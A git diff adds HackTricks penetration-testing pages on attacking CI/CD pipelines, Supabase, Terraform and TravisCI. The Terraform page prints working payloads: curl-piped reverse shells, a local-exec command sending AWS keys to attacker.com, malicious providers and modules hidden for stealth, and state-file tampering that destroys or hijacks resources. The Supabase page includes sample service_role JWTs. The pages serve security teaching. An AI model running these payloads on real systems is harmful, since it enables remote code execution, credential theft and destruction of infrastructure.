and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. + * Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. +* **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. + * **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. + * **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. + * **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. + * **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. +* **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. 
+ +## More relevant info + +### Tools & CIS Benchmark + +* [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. + +### Top 10 CI/CD Security Risk + +Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/) + +### Labs + +* On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it +* Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) + +### Automatic Tools + +* [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. + +## References + +* [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm\_source=github\&utm\_medium=github\_page\&utm\_campaign=ci%2fcd%20goat\_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/supabase-security.md b/pentesting-ci-cd/supabase-security.md new file mode 100644 index 0000000000..3dda145114 --- /dev/null +++ b/pentesting-ci-cd/supabase-security.md @@ -0,0 +1,193 @@ +# Supabase Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings. + +### Subdomain + +Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`** + +## **Database configuration** + +{% hint style="success" %} +**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** +{% endhint %} + +This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ +The password is a **password the user put** previously. + +Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**. + +This section also contains options to: + +* Reset the database password +* Configure connection pooling +* Configure SSL: Reject plan-text connections (by default they are enabled) +* Configure Disk size +* Apply network restrictions and bans + +## API Configuration + +{% hint style="success" %} +**This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** +{% endhint %} + +The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. 
+ +### anon api keys + +It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in + +It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be: + +
+ +Signup (/auth/v1/signup) + +``` +POST /auth/v1/signup HTTP/2 +Host: id.io.net +Content-Length: 90 +X-Client-Info: supabase-js-web/2.39.2 +Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" +Sec-Ch-Ua-Mobile: ?0 +Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk +Sec-Ch-Ua-Platform: "macOS" +Accept: */* +Origin: https://cloud.io.net +Sec-Fetch-Site: same-site +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://cloud.io.net/ +Accept-Encoding: gzip, deflate, br +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Priority: u=1, i + +{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} +``` + +
+ +
+ +Login (/auth/v1/token?grant_type=password) + +``` +POST /auth/v1/token?grant_type=password HTTP/2 +Host: hypzbtgspjkludjcnjxl.supabase.co +Content-Length: 80 +X-Client-Info: supabase-js-web/2.39.2 +Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" +Sec-Ch-Ua-Mobile: ?0 +Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk +Sec-Ch-Ua-Platform: "macOS" +Accept: */* +Origin: https://cloud.io.net +Sec-Fetch-Site: same-site +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://cloud.io.net/ +Accept-Encoding: gzip, deflate, br +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Priority: u=1, i + +{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} +``` + +
+ +So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. + +### secret / service\_role api keys + +A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. + +The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` + +### JWT Secret + +A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**. + +## Authentication + +### Signups + +{% hint style="success" %} +By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. +{% endhint %} + +However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ +This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: + +
+ +### Passwords & sessions + +It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ +It's recommended to **improve the requirements as the default ones are weak**. + +* User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) +* Bot and Abuse Protection: It's possible to enable Captcha. + +### SMTP Settings + +It's possible to set an SMTP to send emails. + +### Advanced Settings + +* Set expire time to access tokens (3600 by default) +* Set to detect and revoke potentially compromised refresh tokens and timeout +* MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) +* Max Direct Database Connections: Max number of connections used to auth (10 by default) +* Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) + +## Storage + +{% hint style="success" %} +Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). +{% endhint %} + +* Set the upload file size limit (default is 50MB) +* The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +* It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) + +## Edge Functions + +It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md new file mode 100644 index 0000000000..d294608f63 --- /dev/null +++ b/pentesting-ci-cd/terraform-security.md @@ -0,0 +1,245 @@ +# Terraform Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Basic Information + +[From the docs:](https://developer.hashicorp.com/terraform/intro) + +HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features. + +#### How does Terraform work? + +Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. + +![](<../.gitbook/assets/image (177).png>) + +HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. + +The core Terraform workflow consists of three stages: + +* **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. +* **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. +* **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. 
For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. + +![](<../.gitbook/assets/image (215).png>) + +### Terraform Lab + +Just install terraform in your computer. + +Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads). + +### RCE in Terraform + +Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**. + +However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly. + +The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**. + +Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: + +{% content-ref url="atlantis-security.md" %} +[atlantis-security.md](atlantis-security.md) +{% endcontent-ref %} + +If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. + +#### Terraform plan + +Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`. 
+ +**Using an external provider** + +Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`. + +Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`: + +```javascript +data "external" "example" { + program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +} +``` + +**Using a custom provider** + +An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): + +```javascript + terraform { + required_providers { + evil = { + source = "evil/evil" + version = "1.0" + } + } + } + +provider "evil" {} +``` + +The provider is downloaded in the `init` and will run the malicious code when `plan` is executed + +You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) + +**Using an external reference** + +Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). 
You can perform this attack even in a **stealthier way**, by following this suggestions: + +* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: + +```javascript +module "not_rev_shell" { + source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +} +``` + +You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) + +* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` + +#### Terraform Apply + +Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +You just need to make sure some payload like the following ones ends in the `main.tf` file: + +```json +// Payload 1 to just steal a secret +resource "null_resource" "secret_stealer" { + provisioner "local-exec" { + command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" + } +} + +// Payload 2 to get a rev shell +resource "null_resource" "rev_shell" { + provisioner "local-exec" { + command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" + } +} +``` + +Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**. 
+ +### Secrets Dumps + +You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like: + +```json +output "dotoken" { + value = nonsensitive(var.do_token) +} +``` + +### Abusing Terraform State Files + +In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file: + +#### Deleting resources + +There are 2 ways to destroy resources: + +1. **Insert a resource with a random name into the state file pointing to the real resource to destroy** + +Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page: + +```json +{ + "mode": "managed", + "type": "aws_instance", + "name": "example", + "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", + "instances": [ + { + "attributes": { + "id": "i-1234567890abcdefg" + } + } + ] +}, +``` + +2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)** + +For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it. + +#### RCE + +It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. 
Example from the original research: + +```json +"resources": [ +{ + "mode": "managed", + "type": "scaffolding_example", + "name": "example", + "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", + "instances": [ + + ] +}, +``` + +### Replace blacklisted provider + +In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well. + +```terraform +terraform { + required_providers { + external = { + source = "nazarewk/external" + version = "3.0.0" + } + } +} +``` + +Then you can use `external` as per normal. + +```terraform +data "external" "example" { + program = ["sh", "-c", "whoami"] +} +``` + +### Audit Tools + +* [**tfsec**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. +* [**terascan**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. + +### References + +* [Atlantis Security](atlantis-security.md) +* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) +* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) +* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md new file mode 100644 index 0000000000..716bbecf1c --- /dev/null +++ b/pentesting-ci-cd/todo.md @@ -0,0 +1,42 @@ +# TODO + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective + +* Drone +* TeamCity +* BuildKite +* OctopusDeploy +* Rancher +* Mesosphere +* Radicle +* Any other CI/CD platform... + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md new file mode 100644 index 0000000000..9d14e97033 --- /dev/null +++ b/pentesting-ci-cd/travisci-security/README.md @@ -0,0 +1,92 @@ +# TravisCI Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## What is TravisCI + +**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. + +{% content-ref url="basic-travisci-information.md" %} +[basic-travisci-information.md](basic-travisci-information.md) +{% endcontent-ref %} + +## Attacks + +### Triggers + +To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: + +![](<../../.gitbook/assets/image (145).png>) + +#### Cron Jobs + +If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: + +![](<../../.gitbook/assets/image (243).png>) + +{% hint style="info" %} +It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). +{% endhint %} + +### Third Party PR + +TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: + +![](<../../.gitbook/assets/image (208).png>) + +### Dumping Secrets + +As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). + +* To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. +* To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. 
+* To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: + +![](<../../.gitbook/assets/image (81).png>) + +### TODO: + +* Example build with reverse shell running on Windows/Mac/Linux +* Example build leaking the env base64 encoded in the logs + +### TravisCI Enterprise + +If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: + +* escape to the host? +* compromise kubernetes? +* compromise other machines running in the same network? +* compromise new cloud credentials? + +## References + +* [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) +* [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/pentesting-ci-cd/travisci-security/basic-travisci-information.md new file mode 100644 index 0000000000..1b24db9bd3 --- /dev/null +++ b/pentesting-ci-cd/travisci-security/basic-travisci-information.md @@ -0,0 +1,118 @@ +# Basic TravisCI Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Access + +TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI. + +For example, in Github it will ask for the following permissions: + +* `user:email` (read-only) +* `read:org` (read-only) +* `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. + +## Encrypted Secrets + +### Environment Variables + +In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. + +![](<../../.gitbook/assets/image (203).png>) + +It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). + +### Custom Encrypted Secrets + +For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository. + +You can access the public key of one repo with: + +``` +travis pubkey -r / +travis pubkey -r carlospolop/t-ci-test +``` + +Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. + +![](<../../.gitbook/assets/image (139).png>) + +Note that the secrets encrypted 